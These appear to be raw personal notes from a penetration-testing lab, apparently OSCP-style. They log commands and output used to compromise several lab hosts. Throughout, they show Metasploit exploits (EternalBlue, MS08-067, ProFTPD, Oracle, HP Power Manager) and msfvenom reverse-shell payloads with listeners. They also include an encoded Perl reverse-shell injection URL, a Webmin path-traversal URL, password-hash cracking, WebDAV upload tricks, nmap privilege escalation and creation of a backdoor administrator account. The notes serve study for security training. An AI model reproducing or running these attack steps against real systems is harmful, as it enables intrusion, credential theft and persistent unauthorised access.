cd /dev/shm
linuxprivchecker.py??????????? (put in on a simplehttpserver thing and use wget from the target computer)
gcc 18411.c -o exploit
proof file and ifconfig screenshot???????????????????????????
more examples
webmin webapp lfi
40 - /..%01 from some script......he manually pulled the stuff from a script in the searchsploit
etc/passwd
/root/proof.txt
/etc/shadow
perl 2017.pl *********
unshadow:
to mash the passwd and shadow together
the output file can be brute forced against rockyou
use the output to SSH into the system
bob BUGZBUNNY or something
alice location1
/usr/share/webshells/perl/....
make a script
set up a webserver to move the script over
wget http://10......80/script_file
run it in the webserver with the 40 %01's
http://10.11.1.141:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/tmp/script.pl
http://10.11.1.141:10000/file/show.cgi/bin/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/tmp/script.pl
############################################
exploit/linux/ftp/proftp_telnet_iac
msf > use exploit/linux/ftp/proftp_telnet_iac
msf exploit(proftp_telnet_iac) > optionsmsf exploit(proftp_telnet_iac) > set rhost 10.11.1.146
rhost => 10.11.1.146
msf exploit(proftp_telnet_iac) > set lhost 10.11.0.81
lhost => 10.11.0.81
msf exploit(proftp_telnet_iac) > show payloads
msf exploit(proftp_telnet_iac) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(proftp_telnet_iac) > options
msf exploit(proftp_telnet_iac) > exploit
[*] Started reverse TCP handler on 10.11.0.81:4444
[*] 10.11.1.146:21 - Automatically detecting the target...
[*] 10.11.1.146:21 - FTP Banner: 220 ProFTPD 1.3.3a Server (File Server) [::ffff:10.11.1.146]
[*] 10.11.1.146:21 - Selected Target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1
[*] Sending stage (826872 bytes) to 10.11.1.146
[*] Meterpreter session 1 opened (10.11.0.81:4444 -> 10.11.1.146:47775) at 2018-02-06 15:11:51 -0500
meterpreter >
#######################################333
msf > use exploit/windows/http/oracle9i_xdb_pass
msf > use exploit/windows/http/oracle9i_xdb_pass
msf exploit(oracle9i_xdb_pass) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(oracle9i_xdb_pass) > set rhost 10.11.1.202
rhost => 10.11.1.202
msf exploit(oracle9i_xdb_pass) > set lhost 10.11.0.81
lhost => 10.11.0.81
msf exploit(oracle9i_xdb_pass) > exploit
[*] Started reverse TCP handler on 10.11.0.81:4444
[*] 10.11.1.202:8080 - Trying target Oracle 9.2.0.1 Universal...
[*] Sending stage (179267 bytes) to 10.11.1.202
[*] Meterpreter session 1 opened (10.11.0.81:4444 -> 10.11.1.202:1163) at 2018-02-12 16:15:46 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
####################################
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.81 LPORT=4444 -f war -o shell_rev_4444.war
Payload size: 1083 bytes
Final size of war file: 1083 bytes
Saved as: shell_rev_4444.war
root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
10.11.1.209: inverse host lookup failed: Unknown host
connect to [10.11.0.81] from (UNKNOWN) [10.11.1.209] 32794
kraken.thinc.local 10.11.1.209
- tomcat
google default creds
google war reverse shell
second link
msfvenom payload---java/jsp_shell_reverse_tcp blah blah blah
nc -lvp 4444
click the shell link in the manager
creates reverse shell
#################################
manager page
tomcat
tomcat
Server Information
Tomcat Version JVM Version JVM Vendor OS Name OS Version OS Architecture
Apache Tomcat/5.5.35 1.6.0_37-b06 Sun Microsystems Inc. SunOS 5.10 x86
Applications
Path Display Name Running Sessions Commands
/ Welcome to Tomcat true 0 Start Stop Reload Undeploy
/admin Tomcat Administration Application true 1 Start Stop Reload Undeploy
/agent true 0 Start Stop Reload Undeploy
/balancer Tomcat Simple Load Balancer Example App true 0 Start Stop Reload Undeploy
/host-manager Tomcat Manager Application true 0 Start Stop Reload Undeploy
/jsp-examples JSP 2.0 Examples true 0 Start Stop Reload Undeploy
/manager Tomcat Manager Application true 0 Start Stop Reload Undeploy
/riFrOgsRJyktlG8m6LfqOyFCHa9P true 0 Start Stop Reload Undeploy
/servlets-examples Servlet 2.4 Examples true 0 Start Stop Reload Undeploy
/tomcat-docs Tomcat Documentation true 0 Start Stop Reload Undeploy
/webdav Webdav Content Management true 0 Start Stop Reload Undeploy
/yCoFdaeoG7hKKO7yZeimqkf true 0 Start Stop Reload Undeploy
msfvenom -p solaris/x86/shell_reverse_tcp LHOST=10.11.0.81 LPORT=4444 -platform solaris -f war -o 4444.war FAILED FAILED
############################
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.81 LPORT=4444 -f war -o shell_rev_4444.war
Payload size: 1083 bytes
Final size of war file: 1083 bytes
Saved as: shell_rev_4444.war
root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
10.11.1.209: inverse host lookup failed: Unknown host
connect to [10.11.0.81] from (UNKNOWN) [10.11.1.209] 32794
##############################################
https://10.11.1.217/index.php
admin
admin
https://www.exploit-db.com/exploits/18650/
https://10.11.1.217/recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.11.0.81%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A
Nmap done: 1 IP address (1 host up) scanned in 0.80 seconds
root@kali:~# nc -nvlp 443
listening on [any] 443 ...
connect to [10.11.0.81] from (UNKNOWN) [10.11.1.217] 56062
id
uid=100(asterisk) gid=101(asterisk)
sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
######################33
exploit/windows/smb/ms17_010_eternalblue
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > options
msf exploit(ms17_010_eternalblue) > set rhost 10.11.1.220
rhost => 10.11.1.220
msf exploit(ms17_010_eternalblue) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > optionsmsf exploit(ms17_010_eternalblue) > set lhost 10.11.0.81
lhost => 10.11.0.81
msf exploit(ms17_010_eternalblue) > options
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > options
msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.11.0.81:4444
[*] 10.11.1.220:445 - Connecting to target for exploitation.
[+] 10.11.1.220:445 - Connection established for exploitation.
[+] 10.11.1.220:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.11.1.220:445 - CORE raw buffer dump (51 bytes)
[*] 10.11.1.220:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.11.1.220:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 10.11.1.220:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
[*] 10.11.1.220:445 - 0x00000030 6b 20 31 k 1
[+] 10.11.1.220:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.11.1.220:445 - Trying exploit with 12 Groom Allocations.
[*] 10.11.1.220:445 - Sending all but last fragment of exploit packet
[*] 10.11.1.220:445 - Starting non-paged pool grooming
[+] 10.11.1.220:445 - Sending SMBv2 buffers
[+] 10.11.1.220:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.11.1.220:445 - Sending final SMBv2 buffers.
[*] 10.11.1.220:445 - Sending last fragment of exploit packet!
[*] 10.11.1.220:445 - Receiving response from exploit packet
[+] 10.11.1.220:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.11.1.220:445 - Sending egg to corrupted connection.
[*] 10.11.1.220:445 - Triggering free of corrupted buffer.
[*] Sending stage (205379 bytes) to 10.11.1.220
[*] Meterpreter session 1 opened (10.11.0.81:4444 -> 10.11.1.220:49226) at 2018-02-06 14:07:43 -0500
[+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
###############################################
ms08-067 - exploit/windows/smb/ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > options
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > options
msf exploit(ms08_067_netapi) > set rhost 10.11.1.227
rhost => 10.11.1.227
msf exploit(ms08_067_netapi) > set lhost 10.11.0.81
lhost => 10.11.0.81
msf exploit(ms08_067_netapi) > options
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.11.0.81:4444
[*] 10.11.1.227:445 - Automatically detecting the target...
[*] 10.11.1.227:445 - Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:English
[*] 10.11.1.227:445 - Selected Target: Windows 2000 Universal
[*] 10.11.1.227:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 10.11.1.227
[*] Meterpreter session 1 opened (10.11.0.81:4444 -> 10.11.1.227:4905) at 2018-02-06 13:06:12 -0500
###################################################################
mimikatz attmept::
use post/windows/gather/credentials/sso
options
set session 1
run
##################################################################
xploit/windows/smb/ms08_067_netapi
10.11.1.229
what was keyed on to find an exploit?
| Public Options: PUT, POST, COPY, MOVE
See if you can just get right in using Cadaver (why??????????????????????????)
command:
cadaver http://10.11.1.229
dav:/>ls
Listing collection `/': succeeded.
Coll: _private 0 Feb 18 2008
Coll: _vti_cnf 0 Feb 18 2008
Coll: _vti_log 0 Feb 18 2008
Coll: _vti_pvt 0 Feb 18 2008
Coll: _vti_script 0 Feb 18 2008
Coll: _vti_txt 0 Feb 18 2008
Coll: aspnet_client 0 Feb 18 2008
Coll: images
- make a sample file aaaa.txt
dav:/> put aaaa.txt
Uploading aaaa.txt to `/aaaa.txt':
Progress: [=============================>] 100.0% of 9 bytes succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll: _private 0 Feb 18 2008
Coll: _vti_cnf 0 Feb 18 2008
Coll: _vti_log 0 Feb 18 2008
Coll: _vti_pvt 0 Feb 18 2008
Coll: _vti_script 0 Feb 18 2008
Coll: _vti_txt 0 Feb 18 2008
Coll: aspnet_client 0 Feb 18 2008
Coll: images 0 Feb 18 2008
aaaa.txt 9 Feb 8 09:33
- make a exploit file using msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.11.0.81 lport=4444 -f asp > bbb.txt
- upload that file
dav:/> put bbb.txt
Uploading bbb.txt to `/bbb.txt':
Progress: [=============================>] 100.0% of 38664 bytes succeeded.
- make target think the .txt is an .asp
dav:/> move bbb.txt bbb.asp;.txt
Moving `/bbb.txt' to `/bbb.asp%3b.txt': failed:
http://10.11.1.229/bbb.txt: 401 Unauthorized
- ignore the unauthorized
- set up an LP in kali:
msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.11.0.81
msf exploit(handler) > exploit
- bring up browser
http://10.11.1.229/bbb.asp;.txt
- hit enter
- sessions -i 1 (to bring that one up)
background that connection.
#############################
in meterpreter:
portfwd add -l 445 -p 445 -r 10.11.1.229
- this portfwd command attaches kali's port 445 to port 445 on the victim machine through the meterpreter connection already running.
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 127.0.0.1
msf exploit(ms08_067_netapi) > set lport 6666
msf exploit(ms08_067_netapi) > set lhost 10.11.0.81
msf exploit(ms08_067_netapi) > exploit
- this string of commands attacks the kali box (127.0.0.1) which then forwards all this to the mail server and returns a prompt.
#############################
going to 10.11.1.230 in the browser brings up a login page.
admin - admin worked!! random guess
logs into a UPS management page. not very interesting.
Description of Alarm Date / Time
UPS Not Connected March 26 2018 at 10:00
Remote Agent Not Connected
Description:
A remote agent you have attached is not communicating.
Recommendations:
1. Stop and restart your agent.
2. If problem continues contact your system administrator.
The remote agent may not shutdown properly if not communicating with manager.
###################################
ATTEMPTED eternalblue crap
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST 10.11.1.230 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true <==also false yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.11.0.81 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
FAIL FAIL FAIL - Kills the computer.....
################################
msf > use exploit/windows/http/hp_power_manager_filename
msf exploit(hp_power_manager_filename) > options
Module options (exploit/windows/http/hp_power_manager_filename):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Windows XP SP3 / Win Server 2003 SP0
msf exploit(hp_power_manager_filename) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(hp_power_manager_filename) > options
Module options (exploit/windows/http/hp_power_manager_filename):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows XP SP3 / Win Server 2003 SP0
msf exploit(hp_power_manager_filename) > set rhost 10.11.1.230
rhost => 10.11.1.230
msf exploit(hp_power_manager_filename) > set lhost 10.11.0.81
lhost => 10.11.0.81
msf exploit(hp_power_manager_filename) > options
Module options (exploit/windows/http/hp_power_manager_filename):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.11.1.230 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.11.0.81 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows XP SP3 / Win Server 2003 SP0
msf exploit(hp_power_manager_filename) > exploit
##########################################
C:\Windows\system32>net user hacker P@ssword1234 /add
net user hacker P@ssword1234 /add
The command completed successfully.
C:\Windows\system32>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.
C:\Windows\system32>exit
#######################################
if you have port 445 and 139 - to see if anything is potentially vulnerable without running the exploits
- nmap -p 139,445 --script smb-vuln* ip.addy
if you have port 80:
- fire up the web browser
- fire up dirb or dirbuster, etc
- google default creds
- search for exploit of whatever the server is etc etc
searchsploit
- -t for searching only in title
- -x and grab the path shows the contents right there
##########################
and now for manual:
10099.py, still dealing with the hp power management software
modify the python code or not depending on if the addresses are right.
msfvenom for the payload
set up a listener, multi_handler
python 10099.py ip.addy